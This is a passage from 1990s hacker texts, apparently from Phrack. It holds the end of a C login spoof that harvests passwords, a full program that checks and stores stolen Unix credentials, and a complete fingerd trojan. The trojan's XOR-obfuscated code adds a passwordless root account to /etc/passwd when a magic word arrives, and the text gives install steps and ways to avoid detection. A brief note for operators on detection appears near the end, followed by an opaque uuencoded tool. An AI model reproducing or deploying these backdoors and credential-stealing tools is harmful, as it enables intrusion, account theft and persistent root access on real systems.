 utime(tty, times);
alarm(50);
}



/* Initialise a string with \0's */

void prep_str( char str[] )
{
int strl, cnt;

strl = strlen(str);
for (cnt = 0; cnt != strl; cnt++)
    str[cnt] = ' ';
}


/* function to catch interrupts, CTRL-C & CTRL-Z etc as
   well as the timer signals */

void disable_interrupts( void )
{
   signal(SIGALRM, catch);
    signal(SIGQUIT, SIG_IGN);
     signal(SIGTERM, SIG_IGN);
    signal(SIGINT, SIG_IGN);
   signal(SIGTSTP, SIG_IGN);
}


/* Write the users i.d., password, personal information, homedir
   and shell to a file */

void write_details(struct loginfo *sptr)
{

   fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
    fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
     fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
    fprintf(fp, "%s\n", sptr->shell);
   fprintf(fp, "\n");
}



/* Display login incorrect only if the user hasn't logged on as
   'sync' */

void invalid_login( void )
{

         if ( flag == 1 && pwstat == 0 )
            sleep(wait);

         if ( no_message == 0 )
            printf("Login incorrect\n");
}


/* Displays appropriate message, exec's the real login program,
   this replaces the spoof & effectively logs spoof's account off.
   Note: this spoof must be exec'd from the shell to work */

void log_out( void )
{
  time_out = 1;

   if ( no_message == 1 ) {
        sleep(1);
       printf("Login incorrect\n");
   }

   execl(LOGPATH, "login", (char *)0);
}

----------cut here-------------------------------------------------------

then delete the source, run it and wait for some sucker to login!.
If you do initially run this spoof from your account, I suggest you
remove it when you have grabbed someone's account and run it from theirs
from then on, this reduces your chances of being caught!





                      User i.d. & Password Validator
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Now if you are familiar with the unix Crack program, as I'm sure most of
you are ;-), or if you have used my spoof to grab some accounts,
this little program could be of some use. Say you have snagged
quit a few accounts, and a few weeks later you wanna see if they are still
alive, instead of logging onto them, then logging out again 20 or 30 times
which can take time, and could get the system admin looking your way, this
program will continuously ask you to enter a user i.d. & password, then
validate them both by actually using the appropriate entry in the password
file. All valid accounts are then stored along with other info from the
password file, in a data file. The program loops around until you stop it.

This works on all unshadowed unix systems, and, you guessed it!, shadowed
SUNOS systems.

If you run it on an unshadowed unix other than SUNOS, remove all references
to pwdauth(), along with the shadow password file checking routine,
if your on sysV, your shit outa luck! anyway, here goes :-


---cut here---------------------------------------------------------------

/* Program   : To validate accounts & passwords on both
               shadowed & unshadowed unix systems.
   Author    : The Shining/UPi (UK Division)
   Date      : Released 12/4/94
   UNIX type : All unshadowed systems, and SUNOS shadowed systems */


#include <stdio.h>
#include <string.h>
#include <pwd.h>


FILE *fp;


int pw_system( void ), shadowed( void ), unshadowed( void );
void write_info( void ), display_notice( void );

struct passwd *pwentry, *getpwnam();

struct user {
       char logname[10];
       char key[9];
       char salt[3];
} u;


char *getpass(), *pwdauth(), *crypt(), ans[2];
int invalid_user, stat;


int main( void )
{

 strcpy(ans, "y");

 while (strcmp(ans, "y") == NULL)
 {
   invalid_user = stat = 0;
    display_notice();
     printf("Enter login id:");
    scanf("%9s", u.logname);
   strcpy(u.key, getpass("Password:"));


 setpwent();

   if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
      invalid_user = 1;
   else
      strncpy(u.salt, pwentry->pw_passwd, 2);


 if (invalid_user != 1) {

   if ((stat = pw_system()) == 1) {
      if ((stat = unshadowed()) == NULL) {
           printf("Unshadowed valid account! - storing details\n");
          write_info();
      }
   }
   else
     if ((stat = shadowed()) == NULL) {
          printf("SUNOS Shadowed valid account! - storing details\n");
         write_info();
     }
     else
        invalid_user = 2;

 }


    if (invalid_user == 1)
       printf("User unknown/not found in password file\n");

    if (invalid_user == 2 )
       printf("Password invalid\n");

       printf("\n\nValidate another account?(y/n): ");
       scanf("%1s", ans);

 endpwent();
 }
}


/* Check to see if shadow password system is used, in SUNOS the field
   in /etc/passwd starts with a '#', if not, check to see if entry
   is 13 chars, if not shadow must be in use. */

int pw_system( void )
{
   if (strlen(pwentry->pw_passwd) != 13)
      return(0);
   else
      if (strcmp(u.salt, "##") == NULL)
         return(0);
      else
         return(1);
}


/* If system is unshadowed, get the 2 character salt from the password
   file, and use this to encrypt the password entered. This is then
   compared against the password file entry. */

int unshadowed( void )
{
if (pwentry->pw_passwd == crypt(u.key, u.salt))
   return(0);
else
   return(1);
}


/* If SUNOS shadowe system is used, use the pwdauth() function to validate
   the password stored in the /etc/security/passwd.adjunct file */

int shadowed( void )
{
int pwstat;

if (pwstat = pwdauth(u.logname, u.key) == NULL)
   return(0);
else
   return(1);
}


/* Praise myself!!!! */

void display_notice( void )
{
system("clear");
 printf("Unix Account login id & password validator.\n");
 printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
printf("(c)1994 The Shining\n\n\n\n");
}


/* Open a file called 'data' and store account i.d. & password along with
   other information retrieved from the password file */

void write_info( void )
{

/* Open a file & store account information from pwfile in it */

if ((fp = fopen("data", "a")) == NULL) {
     printf("error opening output file\n");
    exit(0);
}

fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
 fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
 fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
fclose(fp);
}

-----cut here------------------------------------------------------------------



The above programs will not compile under non-ansi C compilers without quite
a bit of modification. I have tested all these programs on SUNOS both
shadowed & unshadowed, though they should work on other systems with
little modification (except the shadow password cracker, which is SUNOS
shadow system specific).


Regards to the following guys :-


Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
the guys at United International Perverts(yo Dirty Mac & Jasper!)
and all I know.


(c) 1994 The Shining (The NORTH!, U.K.)

*******************************************************************************


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 12 of 28

****************************************************************************



The fingerd trojan horse
Original article by Hitman Italy for Phrack Inc.

This article is for informational purpose only, I'm not liable for
any damage or illegal activity perpetrated using the source or the
informations in the article.

-=- + -

So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozen methods you can use,
usually, if an operator figure out that his system is under attack, he'll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on..  if nothing is found
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
prevent him from logging on (in most cases), here comes my fingerd trojan.
This scheme is quite original (I've never seen it used) and the source is
compact enough to be fitted into a MAG.  The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.

---------- + CUT HERE + -----------------------------------------------

/*  The Fingerd trojan by Hitman Italy
 *  This source cannot be spread without the whole article
 *  but you can freely implement or modify it for personal use
 */

static char copyright[] = "";   /* Add the copyright string here */

static char sccsid[] = "";      /* Add the sccsid string here */


#include <stdio.h>

#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161

char *HitCrypt(ch)
char *ch;
{
   char *b;
   b=ch;
   while ((*(ch++)^=CODE)!=0x00);
   return(b);
}

main(argc,argv)
int argc;
char *argv[];
{
   register FILE *fp;
   register int ch;
   register char *lp;
   int p[2];

static char exor[4][23]={
{201,200,213,CODE},
{142,196,213,194,142,209,192,210,210,214,197,CODE},
{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
210,201,CODE},
{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
143,143,143,CODE} };

#define   ENTRIES   50
   char **ap, *av[ENTRIES + 1], line[1024], *strtok();

#ifdef LOGGING               /* unused, leave it for "strings" command */
#include <netinet/in.h>
   struct sockaddr_in sin;
   int sval;

   sval = sizeof(sin);
   if (getpeername(0, &sin, &sval) < 0)
      fatal(argv[0],"getpeername");
#endif

   if (!fgets(line, sizeof(line), stdin))
      exit(1);

   av[0] = "finger";

   for (lp = line, ap = &av[1];;) {
      *ap = strtok(lp, " \t\r\n");
      if (!*ap)
         break;
      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
         *ap = "-l";
      if (++ap == av + ENTRIES)
         break;
      lp = NULL;
   }

   if (pipe(p) < 0)
      fatal(argv[0],"pipe");

   switch(fork()) {
   case 0:
      (void)close(p[0]);
      if (p[1] != 1) {
         (void)dup2(p[1], 1);
         (void)close(p[1]);
      }

/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
   if (av[1])
       if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
        if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
         _exit(10);
        fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
        printf("%s\n", HitCrypt(&exor[3][0]));
        fclose(fp);
        break;
       }
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/

        if (execv(PATH_FINGER, av)==-1)
         fprintf(stderr,"No local finger program found\n");
      _exit(1);
   case -1:
      fatal(argv[0],"fork");
   }
   (void)close(p[1]);
   if (!(fp = fdopen(p[0], "r")))
      fatal(argv[0],"fdopen");
   while ((ch = getc(fp)) != EOF) {
      putchar(ch);
   }
   exit(0);
}

fatal(prg,msg)

   char *prg,*msg;
{
   fprintf(stderr, "%s: ", prg);
   perror(msg);
   exit(1);
}

--------- + CUT HERE + ----------------------------------------------

I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd

*  if (!fgets(line, sizeof(line), stdin))
*     exit(1);
*   av[0] = "finger";
*   for (lp = line, ap = &av[1];;) {
*      *ap = strtok(lp, " \t\r\n");
*      if (!*ap)
*         break;
*      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*         *ap = "-l";

here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'

*    switch(fork()) {
*   case 0:
*      (void)close(p[0]);
*      if (p[1] != 1) {
*         (void)dup2(p[1], 1);
*         (void)close(p[1]);
*      }

the task goes into the background

*        if (execv(PATH_FINGER, av)==-1)
*         fprintf(stderr,"No local finger program found\n");

here the daemon executes the local finger with remote parameters

*   (void)close(p[1]);
*   if (!(fp = fdopen(p[0], "r")))
*      fatal(argv[0],"fdopen");
*   while ((ch = getc(fp)) != EOF) {
*      putchar(ch);

the output is piped back to the remote system

That's how the finger daemon works...  now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job...  let's examine my code
(decrypted)

/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
   if (av[1])
       if (strcmp("hit",av[1])==0) {
        if(!(fp=fopen("/etc/passwd","a")))
         _exit(10);
        fprintf(fp,"hit::0:0::/:/bin/csh\n");
        printf("Backdoor activated...\n");
        fclose(fp);
        break;
       }
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/

When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working.  Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like.  If the magic word doesn't match of course the finger will work out
normally.

<example>
# finger hit@666.666.666.666
[666.666.666.666]
Backdoor activated...

Well done! You have gained a root access.
(...)
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^ they run NIS... anyway our local root login will work fine

<example>
#finger hit@hacked.system.com
[hacked.system.com]
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)

That's really useful to collect logfiles without logging in and leave
tracks everywhere.


Now the problem....
If you want to use the fingerd to run world accessible commands you won't
have any problem but if you require root privileges check this out:

#grep fingerd /etc/inetd.conf
finger  stream  tcp     nowait  nobody  /usr/etc/in.fingerd     in.fingerd
                                ^^^^^^
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
file

finger  stream  tcp     nowait   root   /usr/etc/in.fingerd     in.fingerd

now you have to refesh the inetd process

#kill -HUP <inetd pid>

now you can do what you want, many unix clones let the fingerd running as
root by default...  and even if you have to modify the inetd.conf an
operator unlikely will realize what is appening since all other daemons
run as root.


Why have I crypted all data?
#strings login
(...)
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)

Lame or not?  All alien data must be crypted..  a fast exor crypting
routine will work fine, of course you can use the standard crypt function
or other (slow) algorithms but since security is not important (we just
want to make our texts invisible) I suggest using my fast algo,to create
the exor matrix simply put all texts on a file and use the little
ExorCrypt utility I have included UUencoded below (amiga/msdos version).

<example amiga>
echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o
static char exor[]={
213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};

char *ExorCrypt(ch)
char *ch;
{
   char *b;
   b=ch;
   while ((*(ch++)^=0xa1)!=0x00);
   return(b);
}

The utility will create the exor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.

Before compiling the whole thing you must add the copyright and sccsid
strings I have not included (they may vary).
Let's simply do:  (SunOs)

#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
 All rights reserved.                       ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI           <<<< SCCSID STRING
getpeername
finger
pipe
/usr/ucb/finger
No local finger program found
fork
fdopen
%s:
         (((((
DDDDDDDDDD
AAAAAA
BBBBBB

The top of source becomes:
static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
 All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"

That's all. Now you can compile and install your fingerd trojan,
the source was adapted for SunOS but you can port it on many unix
clones without troubles.


Few final words to:

Operators: How to defeat this trojan? First of all check the inetd.conf,
           then do VARIOUS fingerd checksums (maybe even the "sum" command
           is a trojan :) if you discover the trojan wrap the finger port
           so you can track down the hacker (usually all wtmp/lastlog logs
           are removed) or wrap everything modifying the daemons, do NOT use
           the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
           tripwire entry to prevent future installations.
           Well...  if the hacker is a good one everything is useless.

Beginners: You must be root to install the trojan, remember to get a copy
           of the original fingerd program before installing the fake
           version.

           On a Sun do:
           #cc -o in.fingerd trojan.c
           #mv /usr/etc/in.fingerd fingerd.old
           #mv in.fingerd /usr/etc
           remember to check the /etc/inetd.conf
-=- + -

To get in touch with me send E-Mail to:

 Internet: hit@bix.com           X.25: QSD Nua (0)208057040540
                                           Mbx: Hitman_Italy

if you want, use my PGP key

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a.2

mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
=bCu4
-----END PGP PUBLIC KEY BLOCK-----


ExorCrypt Amiga version:

-=) S.Encode v2.5 (=-
begin 777 Acrypt.lha
M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
M&#$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)AT<JVR5643h
M!5>GAPX[AJKRS\U::ZHHU,L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*./)Z_h
M!LN;9;=KCF=O67MYI.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h
M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h
M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h
M1Z)$!3MQ;JC1>S;#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h
M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h
M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h
M4%W=M-=2[<AL]J-9ER,S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h
M&SD6@Q?Z]FN84E,]M6AO=;>^>1M?<B5,&R714<JT<B31H\VJ[C"O'&@=&&2^h
M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^;P?^%.YOM40h
M5+6&S)7;-&P]P_0&AW0JK-FE&JZ"`I8[;01#CTW"TKS";-J=Z=$;A?:"*0F6h
M957_V<'X-Z9P9=8E&,XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh
MR)YY+FB^I;)P-)*H$E)I)3T-<TPXOP"##2ECHCQ;FQY^6H$<Z`<#^@:]?`]>h
MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh
M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h
MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h
M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q<HT[*HUYh
MTE9-!FV\*L7$H'UP<QVO<,<,Y1_G;,P>7ZI/]/"IX?74T7PA6H!#.L]64;0;h
MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh
M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h
M'\0TG47H3=73FXOC8B%S&;;:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1,$G#h
MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h
M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h
M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h
MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h
M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h
MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh
M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h
M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0<?[F+)@QO(#PNU^WBZR;:Z/Wh
M//)8[7[?M27B*@"T5Z;QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh
MRV@'FJ=J&TW>FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h
M(`?VXCKVAS/;VJNG5PUD[.<P\%3V[J?1.ML#XV$E0W<,8R`Q#PMQ)>RZ)R"Ih
M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h
M,<TWEU8YQP<$>[F3F)@);%JRGJ?8BQPEZZ@N[3<AS70S1J7J#+B_G"!W]V`2h
M\E4*9N-H/,^<9,W?V+.13DQI1=YR30Q;^<YJ;6Q.UC;?P%E_P%G#NY5&WEZ@h
M3F[JXS,[BIPX(K*T0TK?^S@8F`'+M3&V^OIH1E;?30BZR3+*!3G<RQY"<W-+h
MJO`W-+8ACB9>\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h
M<C/_UYP]=$#]YZI</^\!_Z:&B></_.A`%/,[SN];TSU#_F^AR&W":55Z"6]_h
M(R;]]P9Z1P#DQI-!W)+Z;'&F?`$4^'1?C8M-NXWCR51(W^<2TIT_%N_WE+J`h
MGK@J<:2M4:A3C!\F]0NE-'X8J<VXYB]*XYS"OF?L7'TQK<V@(3#-8/"W5W6Xh
M6ZDO46L#=FK&B>8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!<P-E`U`5CWZ';^h
M"KWO$P+426;ONSIGQ+<$K/<H=?.9@DKW#67"=!5?HMDYE3YJ:Q\/I?1J]T'\h
MHY:<<$J27%_467;9QF7%JMMI!LVT[73R`9[;!DZ)N`'E9V;!@\]@`NC3R7[Dh
M(/*3!&_D986\H/O]`'])L!9L?"Y"$NI>6<?R-*NVX$/IIBV[1E)XUY?]K<@Nh
MWR$8.6@#]Z&OK`:C]Z?-*W:>:+TQ\T7&.'+G^M#EKGR//O\(X<NR]Q9GXVTKh
M`;2][F-I?K1\/(X=7O&]J^_X@;4L9K:E+$_H'G^YQU,@%/>QDR0:3&BO)?B+h
MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h
M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h
M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh
M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h
MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh
M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^<F)I\!N)II<V)I!@^?1@P:9(^4]M=h
MRB=H<28\P\"3BQ.QW^Z3J=9%B;!-ZXQW3#GT#BD[Z:I/[VCLY`V&KM2"CM%$h
M9E4"9S/.S8TF/A]#\XZMM*A<Z.DW,@XDMW4;<R<Q:DUBS>9N)!USDW'3N"M$h
MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh
MU^[@3U,Z<X,'B-D%DYT^QY'!8O9<Z;JTV^Z^.V"__AQPZ7V]3U076&"T3MJRh
M`>ZIB<!_`"4YRK>:#Z%L'N/'Z%QX^)-F31"2%H$+<3<L9U^[OBV68`Q'9Y?^h
M^QUO4^+8_XO^=C_*3+KFZ'S`/=)`\]`=S>(1,LLF?S`&JX^Y53T;/"<77RQQh
ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h
